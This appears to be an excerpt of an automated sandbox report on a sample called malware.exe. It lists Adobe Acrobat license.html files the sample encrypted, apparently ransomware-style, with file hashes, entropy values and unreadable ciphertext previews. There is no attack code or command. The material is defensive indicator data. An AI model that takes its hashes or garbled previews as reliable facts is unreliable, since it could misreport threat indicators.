                        Preview:A.....#....F.q\....c$..d..5..f..$.o7~..q..7...s=Z9V..3/.."R!......b=rKN.a.POb..'b<}....... s~F.;.\x...2.'..&6.qR..Qj.v.W[....,.4.&.m.... ..`.1&#.+V.b.:L.=......p...M$....Q..O}X!O....g..A..!.t.(+.|i..q.X@....*....l....|.!.....5.Q..m<....E.(.....j..Y?..4.....:...n-.~.b..}.......8..H...>..H...c&..._..mw...|.).N..M..;....(IQr.U.2M`....{....+{.....d.y@.....Tn.cHB..TC.'...`.!...0......f%.]..h.8......`......XP.W.w...7$.Z.0....e.M....t.?h...Kb.(tD.....5.m..y.W.].F.~...s..M3u...W].........=...^.]......._.f&X@Q..=...%..2q..+.Ii;4.+......,.....2....J\...M..;6t..k....?.....s.Y...{Nd.a.d.bQ.o.tg.$.....E.....\..4.Z4...[ 3....M}qw../A.O...0......:n~......-....N..v...3h...jpBY%...D.?-L..(.*.(=.I...N.8k.....zm.l=.w...y..C....a.r..yp1..{..L.s.....K.[.D...%....\%..L.p..F.&....0..oh2.....[0.S,..d.]_:.0V.....<ku..!.Sf.~\er.-..=.:.?...{m.-w.......@.7(Y .e.w...9..Aa..ZG....B,.H......cf.,.....aQ..|....3..y...Vo..p.9....v.`8.++.:~X(..&I.4.)..N%..8}w.O.......=)....V.6.....&

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32899
                        Entropy (8bit):7.994734750920365
                        Encrypted:true
                        SSDEEP:768:0CYsF82LqoeBP1xe2sBu7fbkk0IbNBK2ig0gfnIYbJIcbcnm4:phFQ9eifbX0IS2ig7AYbJIc54
                        MD5:B6977C0D89D3F509951385633212550F
                        SHA1:CD7646578E88F90EDC758045E1C937D97AA4910E
                        SHA-256:DED43A0D918765B236B0AE5D3488D2AB0255C56DE01F3288F61F722D2CD879A7
                        SHA-512:EF5F695D19874C5EB37DE0E614A2125479310B667EE753FA85710254D32A7CC423822B464442E39E8C53644751C2562521905013102E21F874C4D968B49AB9F0
                        Malicious:true
                        Preview:....(0.f..........nf1..o.8.A....].g...F..{.{.L.PzY.%.?O...}..a.iv.F..o....B...+.o.....#..8.....!.H'......o.],.F.T)..D.....0i{O..;.......F..."eP.....c.Si.lLZlF?.M.8.|6.P.8h.`.t.SB...4..Pl...(.4Cg.e.Z..OV...:T...*........GZ...I..7w.s..t.x2.V..s.!.A.._.GQQ.w."6...}.9...[.?2mH~9MX....Ga.n{OF.ZW".l*"m....I.C..4..a.Q.@...4]T`j..j*.,..........~.....8..U...S..ty..._......B.N..nCPI...D..L.G.o:a..@q...6.L.."..f_..h1.3In.....j...".....R..eS..j..T]....9.'...`$.Un.[..q....x.kZ7?...|....&/n7..).!.S.q.NBi....J.2....'.........B.3....f.GO'.)^....z.V......E.*.k.....(....G..V ...:..WVs.a.."+bw...*6d.Kf...`(....,K`...W.6WR`..:~a.F........n.9......a......C..p"......h0...:._......y........_.XwD........`.0e.X.,.3]....y.AF.x....F.....yM...(1.i..y.].@V1....w..8F/CNE.0.7.Ww.8.u()..i..H..%iW..j.O.g.%.&....b...`b.^.L5...H2.G.Y."v.....~E.......bi...v.J...3.Kv....X..J.^F1p..=:.wdv..bmh.F.O....5.'....t...&iz.Bj..n&..S.....~.M.........9dZ.-....G.ZS...X..9..p(..~..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27283
                        Entropy (8bit):7.992681540373228
                        Encrypted:true
                        SSDEEP:768:5npb/a4hUY8AZlyvsLYGYRnwrXovqvo6wAV4VL8:hf8AZ3lYREovqABAw8
                        MD5:18CFBDF9A6B58E90231F781A1E9C3546
                        SHA1:ACE8A9DE8B77E3204528A5DC594163BEB9A55086
                        SHA-256:3E4DD378E3D7DEA06215AB4BB031CA2FE38B828EB8B63A45CA3E8977F11F4AE9
                        SHA-512:AEC600095B4551ADC24ADE82062780CBA1E6BD7D8A748B5B16C10D1EFA4EEE6F7C93C01D72192FAA11FF0BCE84DC3C135977A28BB3BF05EEF0849F765AE1D852
                        Malicious:true
                        Preview:.E..h.+..<w......r>.j...9U.1......D>....n..q.j.D. ../"..i.;..*.1..P..3d}O...!.A+1...P..SDR.....~.{....a3.\l.E./!G....%.......\.......x...........l.5.;I.U.0.#Dk..]../.lLa....}..ZhS.:'..(..".S._.....71.agfqy.a."I....G.d9....Y...|34....7....6nC..^}.........>.C^.Z......R/....,1....U......;n....>/.aP.....e9.<...[.....g....OZQe:H..\E=.I.....o....."...A...W...'.x..rL*[U..<.5..A....+.T.d....Ub.D?L|,.:..._...cK^..gc...$.ij3.R...a.K:".r...5..d.Ac..9+..oh..........d.V.G.$n....tJ.......gg...*...<o:...#'.........)u.t#v=w.8...0......GOX...}.\.....l%..X/...%.j`+......Q..G....l.!.5.{.+!.p...(.....+,u.z...=..O.e.j .....O.r2P.....yM....l...S...M...u0,...d....'..p.4..I.H..)L..c......g?r.wo<g.......h}<...x.l$. h...y.{.#|....;.x[h....,....,.,../Y.s.........g.=Y..c:..l{...".I-ey1.......!!...=...n.?.7|...z.I.......pq.+..jT.H.e9.3..0.r..8w..pI:....;27,zz..+.".....G..!..}SU1..q.3....hn<NoH.yrO;.6J8.U........2|.K.-S.C..1..E.............w...3.S..=.N...tv~K.I?W/B...D

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27283
                        Entropy (8bit):7.993385240646005
                        Encrypted:true
                        SSDEEP:768:smJVUFOrzU29xa0aps8FMvBiisyHMs+bVd:dJV1/nozpUvBiiD2Vd
                        MD5:1D29BEBD6404D2DE1325E00B9584EC40
                        SHA1:C7439113E7F580A82796916915F901B353186E9B
                        SHA-256:8DCC31481ABA4D8CF397A2685303D67AB1D74A3E02A4FA5759046DF76D6F982F
                        SHA-512:6839E06BF37E01B97BC215058D02EB1C020CA492DCD6A5F4F1092F4664EB36AEF589898DBB33B70B1793E230E07B8BBFAA8F3FC2A2A0CCC4E69BD8618187EDEA
                        Malicious:true
                        Preview:...........?3...4.....Yb.#mQ.]/|TA;..r..8...n.SC..M].'.....%pP...N.$....$...(xL.F4$@..JN8...FP(....)_.....=/*g3..^......k...%7...-..#..$...9v..M..VF...-....8.L.../.?..}N.<+...+...\.O.-.)u.f[..N.X.)..f..=,........QR.a..W.gv.....~.N.3..$d.......d......Yd.53.]JqG$i)..lG.a.U.A...d0..}9....xi...X.MJ....O...5!Pej....u...W<BV.-..t..kw.{w.c].VnEG'.A..4..8....m..=j..BM....d.x9.uP_...."..)...o..8....>z.]h.}2J..w~l.X..bdc...0.......5#....AN............{F.q.F..iB..P..OE.j.L.O.Px.P.+.gu..O>..n....55..[....%...5....M1............:p.5...y..BbE.ih@..R....ea...a..{N..o.o...Z.(..f..Z.}....w..V..o.i.Kgy4o.T1C&.pS...8...K.ojw....0.D..(...7....B.h.ywlKIi.2..L..\.a.w >0C... ..M......o..S.y......}.5..jU."/....`...}.A..M...%..T0..6>44wU...I......B.Q.5..sGb...N5I.er.u.-.f..|..6X.VM.EGw.O2c..._.g.......*.!..#....^.eZ@.}.v..6...ER.~.e.7..........r.=.0#a...........C..M.........F.'.r@..4,....K!.Jqw..=.W..\--..R}.A,Sa.....9..L.B....>..%.0X..&e[QNe.7...xx....\H

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27283
                        Entropy (8bit):7.993365453222149
                        Encrypted:true
                        SSDEEP:768:5EA7a0Y0lKw1K4NT2p/jbdXftcgZJEZUPfSKpBt/Q:qA7a0lKaxkdvtNJEZ9KpDQ
                        MD5:A8F2F366735168B960D8B25F84B73DCF
                        SHA1:25FEDFAD717F33F863746A5E90AAB987E0F3CE44
                        SHA-256:BAAED45F9783DCF6C35BD0804DDCDAE3DD2B4CB6712E0CE9828BE3EF93DBC2CC
                        SHA-512:BCF0D636AB91D9D8609A08F46B9EEF9DA1E8EF9C5F030B163596D42D2A78C5522090BD95BE36166755AE91984C19EA90057B4A5F8E74239D30A3324FCEA4485A
                        Malicious:true
                        Preview:4).|6j[...)....c.l+..o..;....G.N..)pv.t.!..z......I.w:.).+DM$./.8....q.^w..Cf.U.=vG..`.g.....B..E.4K.=.\.Vc.1..5.......?.....`F..........&QM/[..y$P.....QmL.I$......'G...h...W6d.......=.j.>h.l..z.&.E.......".\....dx..a..u..p..,YG..p3C...aUo.....{..#.(..'..o.(...N.Q...m.}$....N....e....MYBo .~e1.^...........+..p...m.?....w..."+.y1...[.....<.Rs.X...N...H..8C..N!~.c6..p..`=...i..b...jqD.-.a......1`&X...W.4..{U..<3.oPxK...P.U..Y{....\^M4.P.......a..W.t...........B..j..-.7_.Y....`DVY....F..~Z.%....5v.........Q.-..].....I.R..#.G.... .....k.B....K.4<.eP.v..W....t.[.........h.cM....-F8E2D...0.....U.e...."]...'.......h..K.T.I.vj.8[.i..\8?..i=%......r........~.b.A...p.K...t.J.v.b..}:...i.MyB......s.c..:.7..i..B....8S.>...:hHv.P...Il7.....LHM..0G... P$......Q?..u.>.O........'.*,..*.W....U.l.. =M9..V..."e[.A<...@...A..".....'.o2...1|..........66..../....j.g.d.Y.@..i...$y..d..<"k.2NG......S+=../..e.-...k#..s'...%6]+....c

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27283
                        Entropy (8bit):7.993344036588003
                        Encrypted:true
                        SSDEEP:768:zPTnhWfK55Wv5UAPkjvt6cp4se2v2ERgwOJyPuJ:zPcfKHWv5/s7tiIdya8
                        MD5:98D1026F8FB474B493F7A7D46FE2AC06
                        SHA1:D5F198B801B487EAB3431C11D4D4144E60CAACBA
                        SHA-256:C5E5508745337F7B25C9CDFA1AC3411A84C2C83DFB1CF68C4AD3D4269EAA1DFA
                        SHA-512:2E697B11FBD273463ECB03FC3FFB38759550CA1E63A845B1FB3792BECDBAE7B277FEEED72F562B3F643CC74D13C26DCEEA9E7529E6CFDB571E24270CA3C55CF7
                        Malicious:true
                        Preview:.H....8|..h.......R.Xz.NJ...|...u....P..._pU...).LP......K.ls]'.2..U...7.|..=*gc0...M0....Mh!..v.>...z&..........:.Ol...v.b../.S!T......Z.q........Y.|.@|E....=3....R8D...d.H.?.P.b.669t...o..r.Dh>W..{kz.".H.Z.6.4T...,p...y.a.g.4....t.m.a.y2..+...u=..y2.....)17g-h...R.w..q.r}&..;...`."&DQ...dM.OZ#X..c.d..w......n....k3.P...;...\.6.c........6Fz.D.'.\.....U...KyH;.`...].;..w2.}g..G.U."..\Sj:.W,......?.sT..Q5...6...:-R....im.TZ..../.(}Xz.o......#.d......>..W.]..;.9..1......2.&.B......|,./S..hx.\_@5..jXu...f..@......m..%B..C...K...#.H.6.=.f7.....]f='.p...Ov....`.H..X@.D.t..eb..<..Y...xE.8.:..p....h.8.,aO.b..D..o.........#..p....l..1..Ce.-_..Y)V....9>.....fN...>."...9.?.R.`...F..y9.mX..Q......Bn..P.i..nN.Ts.0+.#)E...i...l...gM....K....J ..p.a..e30\m..Kl..v._<...-.j..rJ.jE..q*...;V....n.....s..C_..m"j.O.dA...F.j...H.yo..x.....Wh..k..U..S...tv.e..W..U.E(..........T.]..,T...}w..x+R....l.#l...[_..M.3..............q.;.........<....9o..=x..H....S.P.......oX

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27283
                        Entropy (8bit):7.994183435410029
                        Encrypted:true
                        SSDEEP:768:fjT2yTStyLOm4Jxm1R1vdG260iXtDd7L3zMs1EFOf:ryYH4JcfGka/3zMs1EFOf
                        MD5:1D0AF880E64DC64E8946D51C285E4562
                        SHA1:5790B34334863023481E6E02CAFD08130E74E03A
                        SHA-256:CF435FD4E56F85D9939EAEC2E06E5C020F3E9D40B5A31B2A382EF5BF0BCF094F
                        SHA-512:5E6D04C5A039FA7502C416A35E90314DAE871AD8F2967F9341A20DBE26E106E0A9FD13CE5C1492C50C5531C43EB00B0A94E3EBC9F76E20448D45629DBEFF66EB
                        Malicious:true
                        Preview:4.r.....0|.[Xc..........}.N.....s............2...\y...Q.......q1[.^.>.X.A..+J....;.|.x!\......k...y.d.l....Wj.k..... _.....P(.".o.^..\n........h...h..8....f&........Bf..U.^n+....Nu.4........Aa5&.2....,.........9zm....!..i.h.5.._8.................Az.O..h.E....e.(.N6F.9=..K.0S.q..L.=.1.r...chm.\....i......H....e-N.Z"'.....w"..z.e.G0....,P......./r...sbzZ.`......R..24D(.T<m..`..M&..;....2t..[."x..y.=X...hBq.=H..z...pI.Z...!...I..p..5...2.L_.g.l.Y..T.^....y...._._.L.."........Y..........._.h..N...I.B.........C7 .5H.1V.y.T$.dP....L.Z1...i..v..9+y......".8o...?r..\..........,..ey....?k..6...6Z....(.2:.1k.0....*F.....:...5.IOy...<....]).(.C.\.......n...dqF`.X....7i..F..*...X.....v.z...<...{?....O..,.....#.j.......=.X.TED^N.m...u_..EWN'.0 .O.\..T.]..*m.....u-..3.?.._6.....Y.]8k.......$Gz....U..}S.U.9....\.....W...C..'.....(.wU/.A@ .6^6.K..r.F&.....$.O]qoe....d..E....0.5..~.H..C.]Q.W^....k.{.Ny..'.C..%.G.aRlQ.#.l.X..X.El.m~Qi.b....?M+..N

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30746
                        Entropy (8bit):7.9942847505909205
                        Encrypted:true
                        SSDEEP:768:s2XU1fXtBxE/sOjLYrP3JKnKQ9P7ie99sD:vQfXBgPYz3JNQd9y
                        MD5:34FFC146BD50D37D8AD9AECA2F8FC341
                        SHA1:55E175AB13D6CB6B435F762D188A75767DD229AF
                        SHA-256:2EE9E49AE6AE40E084D8121E805991A7AD66188F57D84054C2F9930CFC274F1B
                        SHA-512:5C156584997D652933DA887CABDB049AA95ACFD804C419B91BF2F11BD7616C94A02F64FC757D920E7407D0DFE14E2CECF7461E9AD83C09DF40D991AAD09F3B71
                        Malicious:true
                        Preview:2R.q..65.|.|4...!@.0..$.F..........bT..%/(Y.n.1...N....H./.'............+E....4/...Sf1,fNI.V^ /.A...i.L.B.d.#..S(x.m22..R.Q_1.z++..O)..Y.?.6F.|.LF.r>.$.....FQ..aP.\(F...D.}@Qe....qi..:+.y.]...3=.?fP...&.V.....(...6?9.8..C...c...(-....=yr.x5.0|i...V...v......XR ..9.w....p.....6. ...3....M@Ow|........H2..dm~.A.3s.....\@.=.49...Nf.d..&.[v....%.".G^..J..Xo?.Qi......{&Q...........r...A.....U....e.R.D..{.dM.....-.ih.T..O.P.T...g..0.).f..\!...`.........U.nHd.N..y...a.-.,.]0....q.T..T.....F...=R&.....b.2..&..nk.Y.].Pj.!....<..%..qM..L3..vA.[.g.W.o.......a.K.g.....B..1..f...^7..\?.8c&$.g&........Z....QgU...^9...H.......1..........$.Z.P.......:.[r..,..R..,...p...G>q.p.ZR[FukRsw.~.P...j......./j..4q.e'.@. #..ED........'b..g.....C*..q.....+T.}j....6#I)42b.]h~...Bg}.0D.......b.h!\.K.d....eG...So9?.w.2i....<...;.u.Z...Iy.Q...(..J.>S.=.... .........-......>..Zz,..........L.y....._...v..!3...7....E.)..(8.a..q...E..2 U:.E.P385.%U.D.|h<.X....l....REQ.pCdz1.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32311
                        Entropy (8bit):7.99450655421148
                        Encrypted:true
                        SSDEEP:384:GJi5z/3k029oNgGgGFmnwd77v5Y9yq2VqXJFiFCRh+wSW5El0gsOPhTsGbDIbQU0:GM5zbpxd+2gZFiFC5WtsmUEWptk
                        MD5:2DCBF8DA3B58CE1C6B558F942FB4D096
                        SHA1:0752A061A44B2080F32928308B2F65CCB4AE4DAB
                        SHA-256:80CF7850610F58FB2F9431514E0D475EA0017607A3512D9C9938EEC79EED020F
                        SHA-512:5EC147E2940881511FDA505EDE7675855A872C0CB41C0E747F944E2A54E65695A7AF9C92529FE86F40E872AA2E25532452628B97BB449ABF2C7F2B1DC651AC1F
                        Malicious:true
                        Preview:6..".Xl..tT{=.x....f...R0...>.2U..k..b........a3....O..........I6e&.8...n.Nl..4..|xW0"..md\h8..I...\W.....0.?.2K.5....N..;.....>...0.r#..-..d..,.+.o.~@5....|zT..3..H..iu.)...}<..2.`|Uh....^.".$.....|.t.PWL......q...........c..gC.CVd...4.-..;JJ...~=..l..O.I=..."........^...v....O.z..*.....`.(...s2..].__5.'OAW..;.......x......B.#.....`..74At..u.7Bm5..6o.NJ..kX.W...T.._..h.I.i........6.:..4....rf/..UE. W........ Q%....,.{....1..........&Y_.......P7..@R..4G..qe"P.....L.iE..$N..x...N.c.....j....o.g..$.gybH..D@...[U..aPI.vJ.rp.......kD..@..:.a...:.u.J.8.2.:.....0..U.5...f....|.I]..[......_C.f.Z.tNI(......XMe.....P..1.5..nt....o..Z.P..,....../..V.b.R3........X.....$?1g<&a.^.ZA.dW.....m...K.tp`.D.hP....oqqz-.y.a.....F..........N.E.P..(C...{I....|..........&V....,....V...b%."....h..<G#.&.o../..k2..........\...&..*...h-.....M..w]....y..{..pb....~J.tP..;.+(.P3.bM~%...].t.AeLr...O..'.g.E.[.i....Tz...E.{....... h...+..[.U7.OS..d8.IF.W5.NAEu..1]./a .He.B.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33432
                        Entropy (8bit):7.995066601846065
                        Encrypted:true
                        SSDEEP:768:0/5sDrQd485Puiv+IvF6tJKeunnG4DU1N:0/5IrQF5P5JgtJRuU1N
                        MD5:4781026197A5AF3E8C7E8B7421458885
                        SHA1:D996707C1BE9BB2C7ED70DB71CCD1893A046C6D3
                        SHA-256:E34AE75BA4EF7523FA31B09FDE9F0CE82C60BD2699E20D579CB95A14FF0B9774
                        SHA-512:BFD799E61D02A74866BB7E506A28214BB3C3DA8830163C7C25F57B9500A16E1CCD5133609B482D59B8B5B8433A07F9D93D0F2C3CEF501556B469420F57D56161
                        Malicious:true
                        Preview:.....E..B\......u...a..ou.-.S.m(9...s.r....RO.^a....`...M..Q.U........fP......7.n...;..yD{p.{*.l....e..wN.......t[.A..b...>.:L....BS.z.L..ahC.A.q?."..'f..k".KD@.?.Z.r....J.m.di.%%..!K.....z.bxXt .h...y...G..G.V....njQ.......FBF...{.+o.b^.........0<t..o.....k.C...$EY......\.;.M...\..i$.kcUln+,.d7)..|.D.Fw.%$.*.0.+./._.dp:.h.cHA..J,....t~....;......l..}E.Jz....y"m..TZ....1.tVc.cT......7......k.I...U.m..o...x0.3......ZU.b....w.$.y#/..d....h.g0).i7....c.....M6.o2.A6.w......mVh....(ZW..'7$W.6.;.. ..y.j..3~..I.Z...H.&..N.y".a.V.,7.....:..=w....\..q.....*....~B@p\n....c..<.7.z..8"I.D.3k..n2m2.[....0x..... ...y.r..8].&.3 ..H....>...=...{...0..D...OY....XS....7=...E.......1G.w....`...s.(..d..h.....N..x&y..$'.*....7..Z...K..L.55.TOB..T.XW...yz.G....F...49.%...I.R....G..P.....Wne.FF}...fV....gg7H..+.yO.JG.B$q&r0....V......,+..Z[%,..\zye..Y.....:,..Xg5...I....:.9...rNz.'.\>.f.........4^...5$....\.p.v.s1.w..:.K......>\;.....TMm..'j.+CD...m..m

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33432
                        Entropy (8bit):7.993294636481929
                        Encrypted:true
                        SSDEEP:768:R160ffqnxSEpjdPsSG7zDCuPtUP+PwtTGo6a6pM1FAfPjrV49W4SbB:RVfqnzhWS0HC2tUP+ISaVQ7DX
                        MD5:CBA1DB7AED99C1154FC26EB1E6B3EA12
                        SHA1:A2D7BEED8930887892060889FC535C3FD52F5219
                        SHA-256:2A5A958D5FECE0DA8BC6F0EC486D98B0AA14F0C3A2CAEC2E3409F57F88B523B0
                        SHA-512:2680FF27E5CE3EDD33ABA854034A132CEECB7700B4283D9EAFDC82E4196BDC2DC5B18920CE77F629B341E947120A5654B91170ADCDB8113B495F10BDE88A3105
                        Malicious:true
                        Preview:.:....).J.1....8j)9.:.4.*.N.#.\Y....dF.|M.M0.<.5.<...<..)...N#....:.....(!..5.......y..p..i....al...U...j...x)b.i......X..U_..a..d).`...~.*....$.^.;..I.aV..[.G....8.&.$..h....v..f...W....X.I....g..]U..5.5w.Tm.h..q...X..2em.....`F....W..\.W/....H Ye.N2.yr&[{K.g..d...T..`.1.....W.....[.D.......i^xO..Y.}.W.:x...}..:ZR[E.Bq?..?..d_WH....JFCyT....e.D.../...j.*.2..3.W.R..D..'b.b..s.|..{..f.%T.`4...q.=...=...%.....}F_...OF...5.Z.. ..O.{........I..5.\."A-...O`.(.*.qK~@Q..O..P.|..E..... 5.O+]F./...uG>..,..=.......'.i....l{kM,.4....xX...z5..9.h..m..A6.v..4AW.QX.q............O.."[...'Av.f^......'. ...3....\nG.,...'.z6...s..E......pu%:5.h..&...0]."....m......$,9.%.0.{[@~.>9i.....YQ4.)..}.....|I4g.ri.y.<..@.........M.1....U.....,....y..&J..r..2..J.H....0Se".....).....wq....D.]...Z<....ACm.{0 .\.....LG8("..0.5.,.R.1...(*....I.....>......=T..b.as.Q. ..zc.0o.......c..1.....P.Y7@t.Go."%.w.4G..8-...:.[b.....8p.U@....{....F..wY.|..W./...."....Sw.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):36474
                        Entropy (8bit):7.995155059476049
                        Encrypted:true
                        SSDEEP:768:mzyXqPEYxvThmMb9kYTt1pGv8IC77auarcefs+jLx6jB57kWKzTS:m+XarxLLTxmv837Ins+jd29hMe
                        MD5:DA0D004F48F6DAB2BFF158AE5B9C2B59
                        SHA1:A683F45C8D2A351B0C3FD5B1BDE9D98203B893C0
                        SHA-256:E32DB892E6F9F7CB73B23233C92B655673DF61F9909EA02DA772620E8B13026F
                        SHA-512:0404EFD7504A78100E33BE3783EBE57084142413B14479FCCE61D6FC6C2FCCBDD1570FEC295DD4EB88626E0192CAA376A6AC338935A835DA593687A953EAA3CD
                        Malicious:true
                        Preview:..4.U.X{....S.G....2|..oL.........Z.n..O$g..3w.3.5.4'..%.U_%;3./..K_)....c.g.k.J......1h.`.RP.....;.Ou...7{@n.a...gJ4}{......7.L.A..7j.SN..3....AP...A..o....m.S.......A.....cQ..&.4.8..W*r@..6D..F_,..~.M?..!.o.z.p....9...1p...a<}.....h.T...........cz.3;`M.z..R....d........._]0.i...wi...T.?Gt.Hv..."f..O./.9.......:-.S...C=3./V...~.,l..5.....}6!...f..'.t...a1V...W7^.B...L.P..0.....%.A...G.?P...c.m....'.548O......._9;.\..=..H..]&o..<Z...M.....1....iN...I.:.#Si.T..b.......4a?g...W......5S.p.|.y.R...!......#......m..+.-Z....{S.nEb.tO....U..R.m8...".....V*Q.s.. ..F.,C.D5[.t.V:.Q..*.../...:]..O....X.Tb.iJ.t8.y...nO#S.....P..1.(.y........U..nu&.....C:m....W...My*.r.FF7O.RJ..!)...1P..A.cfE...=NMX./. K.:.x.#...........C.J.c(I........C5....+...0..$..n2..Caf>.K"....../...4....T......1.......P..Y.d.......F`...#.,]fV.....a.....SK..o.J...0...7.?.~......P*H.z(P4:m).<baW.:......;.=..Q.=...*.j......'...Dw......E...5..........k....+..`........`....\.$

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):35166
                        Entropy (8bit):7.994301260370519
                        Encrypted:true
                        SSDEEP:768:lkY1lKzITOmYhQi+qiExR7U6QhoPj8gU+t5SN/WVrjyUZnai1Sjf:lP1wQOmYHiEEzhob9U+t5W+rjyUpaASD
                        MD5:86A41C20F6FDA7A2A9CBBB2DF9751052
                        SHA1:40FB3EAF9952F057638BA1FF0D5E94F2B2594872
                        SHA-256:A8F1324E99481C587233AE8CE9AD97D7325BAE346739E5E6B405B7F4F38ECB1D
                        SHA-512:E4C6350DEF952279EF64E04FC04B87089B8B6FA145E17A640A78D9B03CECBDD632F889897F970FB60086B6DDCD13119BF2FFBA989392D10FE77E7477091ECAF4
                        Malicious:true
                        Preview:i.......ze>("1..A5. c......".oK..&fZ.J....4......$.8...=......4...o.{1p....R....>...B$....k9.:.c.....\.......&h..`...D.[:.4.wl.*w...2eT.*..?..X....LOK..-....*.g...;...whI/.A......J.S........Tg...G.(...4.......P...Y...r<..m.k.x..Yd.C....\ ..f....a.......{.C0...M.Zw.../:d.......7 AF.8..2..D...|...=.[....$j.c2...7P....ag.2.6$?c.ap.e...y.=.do...0s$G..f...R.\8\....E..}...(...H...\....6._xB...${'..r..D...%c.].......L...{90)V..,d..P-.....[..."........E..[..WK[*F.....LR..Y.~..3....#@.c~{e.v.....k..vaw.`...l.T.ld.|..t1....jm...U..d(2.D..$...D.9.0.0.......o.od^..W.Z......f...3"....li..irW<L)/.].~...3."R{..F..!...@)l.... .`..6..M..t..;.aC..y..1....a.....T...&+..;^.*.kR.....s..[...,...%q2..?..v...+...iEo.pr.....a#.n.1?.kJ.z...\..(..\$...t1..L..!Y....x..Y.5V...(..`..yF..5A,.N~.lxu.|n.Z(H.BL...N.E.o.3B&.~W`.4....HG.'v..#q...J.DM.L.n....4.8.F..2Lo...B.}....1.K_.>.J...Q.....ii..D....^.m.bi.y:3.H..j.|...H<..#..7.T...i..6._..7p..0;.....M..m.F,/{...1....."..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31464
                        Entropy (8bit):7.994709220047121
                        Encrypted:true
                        SSDEEP:768:3MYpDRmXM8pEEyURqZ4nbwHQe3yJuRoWjlLQz5sQ5:3MYDR4HTq4nF2yJijlLQ55
                        MD5:178296A018D6EA39848FBA9C24B4C7B8
                        SHA1:863BABB2F976513C70728B84333EE7783DB1B84F
                        SHA-256:05B5F3068990EC821F9692235E451A3DF36B602F68C8B5E56574697F800B4099
                        SHA-512:E140B07A1E8A740FF81ACA29C59AB3F5872B26A95BECC04872DE1637E97B9917383B94C341EA000FE97008B25D6EFEF4D0B71F257C40D2B9AA53FDCA292140A2
                        Malicious:true
                        Preview:.b...._...!.)....<...I|`I.Q-.2......K....y..r..nW.Or"....Wt...=l.e~..c.".{+T.*.......&..L.B..?..A.L.(..........&T..d.Lt.K.v^.....XR.7.?..[2r..q..'.|.{....NL...AU.$.C..nN.s`.^..h..4.*......EM..?CZ..)...&.4....=.]O......'Km.5....h.th....<,.P...6..G.B..c.....M..U.$..l..d7....sk]....Th+..1..B...)K.u.Oi...).*cI..!......"..O.o..]2....v.TWs..%.e3.v..n.^...b...t3..Q.n......n....V...UY....8.%...@.8.C.[.F..Z$..w...de..g.P...+e.....r..}.n....Y.];.......m..=..%.....V...q..LZ.....M.m+7.G@1f..@v...4.....'..@.s.. n...,M..uW......y..n|_.Gv...p._.....RE0.f..l.x.z..J.<.]p.'....,.R9n.*.....H.....3.....q..A...........Li....O,^nrX..@..<j..........)...De,...3Q.C..i.F{.Y....6o\....).OE......JS.+..%....22.Q.t.|'x..*..H.%?.w...wI$.r..5.....L.N...6./..i...yqu...$..u,sY...T.k..#......v[~F.....5l...n....:...@[.._.43.%."".gz.................:.m:3.[+}.,,..3mk.t.....LS:.:.&.!..h.T...U..._..@.A......!.......6.......r..S..j.8o!)...]9U.X.\../......"..4..A.oZ...$..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):37715
                        Entropy (8bit):7.994934121297145
                        Encrypted:true
                        SSDEEP:768:rOmlTobwtnR4XP1gl3azzOGiwobMlpAasejSgWiNscpxxX6KZYYkuDVgCzO:/lT0wz4Gk6bMlpPjScpTXrZBf/C
                        MD5:3785DF4A8291E651EDB51661C625DCCA
                        SHA1:D167827DB38DF3EB1EE3878A9178C5782E8BD21B
                        SHA-256:19B81B871E337E08927EBDF79E9FECEFAB14F83665049FDC8782098D14A681DF
                        SHA-512:401AEBA87138A78FBED85EEC4FD1CDF987A3FACB62ECE03C742F028AA3480F816F508668AC75FC28ECC23BF4444A53FFBAFC15B8D6E65E1D57E224CC97EF0B79
                        Malicious:true
